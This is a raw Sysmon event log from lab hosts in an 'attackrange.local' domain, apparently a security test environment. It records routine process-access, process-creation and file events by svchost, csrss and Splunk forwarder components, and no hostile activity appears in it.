07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081723Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081722Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081721Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081720Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081719Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B2C1-615A-5201-00000000FD01}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081718Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2C1-615A-5201-00000000FD01}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081717Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:33.148{2FDD8D40-B2C1-615A-5201-00000000FD01}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103868Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:33.370{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FDDBC4D8FACCC7DE39C9E616CB297E3,SHA256=7A9FDAA5D85F3670B2E701F8B0CA0AACC965274416B4D5CB4875FAE85D799193,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103869Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:34.370{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF57EFFBF025B27AF5150E6BC68E3AF1,SHA256=E213AC038635D900983415AB7EBCB7E1285EC890112A2BC3ABF1D1F402AA8AED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081746Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.945{2FDD8D40-B2C2-615A-5301-00000000FD01}8443912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081745Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2C2-615A-5301-00000000FD01}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081744Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081743Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081742Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081741Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081740Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081739Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081738Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081737Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081736Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B2C2-615A-5301-00000000FD01}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081735Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081734Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.773{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2C2-615A-5301-00000000FD01}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081733Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.774{2FDD8D40-B2C2-615A-5301-00000000FD01}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081732Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.367{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D77DEAFE5D1463D5B173B7E3116DCAE2,SHA256=6EEABA1066A8E8C7E28FC2A9C4386C0853C3E4ED21F99E4241DB270222B8D0A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081731Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:34.351{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=958FBDE6ED00F8408310315DF570D626,SHA256=2EBF5666FA14BEA65D8E6A0A35FB1BDA9DD33C09B120DA8CD537DAEC4119829E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103870Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:35.386{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7115651EBF328886754008AF40928ED1,SHA256=7352611A6507DFF8F9A6C124758685D645D1ABC25764120EFE0E77E46B7A8950,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081762Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.981{2FDD8D40-B2C3-615A-5401-00000000FD01}16601664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081761Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:35.820{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2C3-615A-5401-00000000FD01}1660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081760Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 